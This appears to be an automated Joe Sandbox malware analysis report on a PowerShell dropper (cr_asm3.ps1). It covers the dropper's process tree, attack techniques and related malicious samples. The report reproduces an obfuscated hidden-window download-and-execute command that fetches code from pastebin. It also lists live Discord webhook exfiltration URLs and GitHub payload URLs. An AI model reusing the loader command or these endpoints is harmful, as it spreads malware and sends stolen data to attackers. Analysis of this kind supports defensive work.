Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960 Thread sleep count: 4221 > 30
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000007.00000002.2552363680.000001F0CD83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2554300702.000001F0D2E54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2552266377.000001F0CD82B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745962060.000002927D98A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Code function: 6_2_00007FFB22655024 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFB22655024
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Code function: 6_2_00007FFB22654CE8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFB22654CE8
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Code function: 6_2_00007FFB22651910 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00007FFB22651910
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | Code function: 6_2_00007FFB226551B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FFB226551B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 111 Windows Management Instrumentation; 3 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 111 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 131 Security Software Discovery; 151 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1534234 | Sample: cr_asm3.ps1 | Startdate: 15/10/2024 | Architecture: WINDOWS | Score: 96

Contacted domains: pastebin.com; raw.githubusercontent.com; discord.com
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Suspicious PowerShell Parameter Substring; 2 other signatures; Connects to a pastebin service (likely for C&C) (pastebin.com)

Process tree (child processes indented under their parent):
powershell.exe
    network: raw.githubusercontent.com 185.199.109.133, 443, 49701, 49703 FASTLYUS Netherlands; discord.com 162.159.138.232, 443, 49775, 49852 CLOUDFLARENETUS United States
    dropped: C:\Users\user\...\Stand_Trainer_Updated.exe (PE32+); C:\Users\user\AppData\Local\...\Backend.dll (PE32+); C:\Users\user\AppData\...\dwdaoju2.cmdline (Unicode); C:\ProgramData\...\BeginSync.lnk (MS)
    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Tries to open files direct via NTFS file id; 2 other signatures
    Stand_Trainer_Updated.exe
        signatures: Contains functionality to inject threads in other processes
    csc.exe
        dropped: C:\Users\user\AppData\Local\...\dwdaoju2.dll (PE32)
        cvtres.exe
    conhost.exe
    attrib.exe
forfiles.exe
    powershell.exe
        signatures: Suspicious powershell command line found
        powershell.exe
            network: pastebin.com 104.20.3.235, 443, 49759, 49764 CLOUDFLARENETUS United States
    conhost.exe
forfiles.exe
    powershell.exe
        powershell.exe
    conhost.exe
svchost.exe
    network: 127.0.0.1 unknown unknown
Source | Detection | Scanner | Label
cr_asm3.ps1 | 0% | ReversingLabs |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Backend.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe | 0% | ReversingLabs |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/ProdV21C: | 0% | URL Reputation | safe
https://g.live.com/odclientsettings/Prod1C: | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | true | | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | | unknown
pastebin.com | 104.20.3.235 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll | false | | unknown
https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 | true | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe | false | | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 | true | | unknown
http://pastebin.com/raw/sA04Mwk2 | false | | unknown
https://pastebin.com/raw/sA04Mwk2 | false | | unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 0000000C.00000002.1701038367.0000029200B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmptrue
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://discord.compowershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://go.micropowershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              unknown
                              https://discord.com/api/webhooks/129575196622756powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://raw.githubusercontpowershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.1367837796.000001F0D2BE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.ver)svchost.exe, 00000007.00000002.2554051222.000001F0D2E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://discord.compowershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://crl.microsoftppowershell.exe, 00000011.00000002.1846302686.0000024098480000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://raw.githubusercontent.compowershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                                              unknown
                                              https://contoso.com/powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://raw.githubusercontent.compowershell.exe, 00000001.00000002.1510210225.0000026C9313B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTpowershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1false
                                                  unknown
                                                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Photoshop_Set-Up.exepowershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1false
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408034C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
http://pastebin.com | powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmp | false
unknown
https://pastebin.com | powershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmp | false
unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dll | powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | false
unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
                                                          IP
                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534234
Start date and time: 2024-10-15 18:07:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cr_asm3.ps1
Detection: MAL
Classification: mal96.troj.expl.evad.winPS1@23/27@3/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 25
• Number of non-executed functions: 22
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: cr_asm3.ps1
Time | Type | Description
12:08:07 | API Interceptor | 388x Sleep call for process: powershell.exe modified
12:08:12 | API Interceptor | 2x Sleep call for process: svchost.exe modified
18:08:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
18:08:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 104.20.3.235
gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
cr_asm_atCAD.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
Match: 162.159.138.232
cr_asm.ps1 | malicious | Unknown
VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm
xK44OOt7vD.exe | malicious | Unknown
steamcodegenerator.exe | malicious | Unknown
Lm9IJ4r9oO.exe | malicious | Unknown
cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm
OSLdZanXNc.exe | malicious | Unknown
steamcodegenerator.exe | malicious | Unknown
cr_asm.ps1 | malicious | Unknown
SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: discord.com
gabe.ps1 | malicious | Unknown | 162.159.137.232
aidjBV.ps1 | malicious | Unknown | 162.159.135.232
cr_asm.ps1 | malicious | Unknown | 162.159.138.232
cr_asm_atCAD.ps1 | malicious | Unknown | 162.159.136.232
cr_asm_crypter.ps1 | malicious | Unknown | 162.159.128.233
vF20HtY4a4.exe | malicious | Unknown | 162.159.136.232
vF20HtY4a4.exe | malicious | Unknown | 162.159.136.232
VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 162.159.138.232
OSLdZanXNc.exe | malicious | Unknown | 162.159.137.232
5UIy3bo46y.dll | malicious | Unknown | 162.159.128.233
Match: raw.githubusercontent.com
gabe.ps1 | malicious | Unknown | 185.199.109.133
aidjBV.ps1 | malicious | Unknown | 185.199.110.133
cr_asm.ps1 | malicious | Unknown | 185.199.108.133
cr_asm_atCAD.ps1 | malicious | Unknown | 185.199.110.133
cr_asm_crypter.ps1 | malicious | Unknown | 185.199.111.133
na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
65567 DHL 647764656798860.xlam.xlsx | malicious | AgentTesla | 185.199.109.133
Request for Order Confirmation.js | malicious | Unknown | 185.199.110.133
RrEf8Rui72.exe | malicious | Unknown | 185.199.109.133
Untitled_15-10-04.xls | malicious | Remcos | 185.199.108.133
Match: pastebin.com
gabe.ps1 | malicious | Unknown | 104.20.3.235
cr_asm.ps1 | malicious | Unknown | 104.20.3.235
cr_asm_atCAD.ps1 | malicious | Unknown | 104.20.3.235
cr_asm_crypter.ps1 | malicious | Unknown | 104.20.4.235
vF20HtY4a4.exe | malicious | Unknown | 104.20.3.235
vF20HtY4a4.exe | malicious | Unknown | 104.20.4.235
VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
OSLdZanXNc.exe | malicious | Unknown | 104.20.3.235
5UIy3bo46y.dll | malicious | Unknown | 104.20.3.235
HQsitBLlOv.dll | malicious | Unknown | 104.20.4.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: CLOUDFLARENETUS
gabe.ps1 | malicious | Unknown | 104.20.4.235
aidjBV.ps1 | malicious | Unknown | 162.159.135.232
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 104.21.53.8
cr_asm.ps1 | malicious | Unknown | 162.159.138.232
cr_asm_atCAD.ps1 | malicious | Unknown | 162.159.136.232
cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
cyCsE47YV3.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
RemotePCViewer.exe | malicious | Unknown | 172.67.37.123
https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvw | malicious | Unknown | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
gabe.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.109.133
aidjBV.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.109.133
cr_asm.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.109.133
cr_asm_atCAD.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.109.133
cr_asm_crypter.ps1 | malicious | Unknown | 104.20.3.235, 162.159.138.232, 185.199.109.133
na.hta | malicious | Cobalt Strike, Remcos | 104.20.3.235, 162.159.138.232, 185.199.109.133
cyCsE47YV3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.3.235, 162.159.138.232, 185.199.109.133
z7NLXIia8r.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.138.232, 185.199.109.133
wbxZk3AvuB.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.138.232, 185.199.109.133
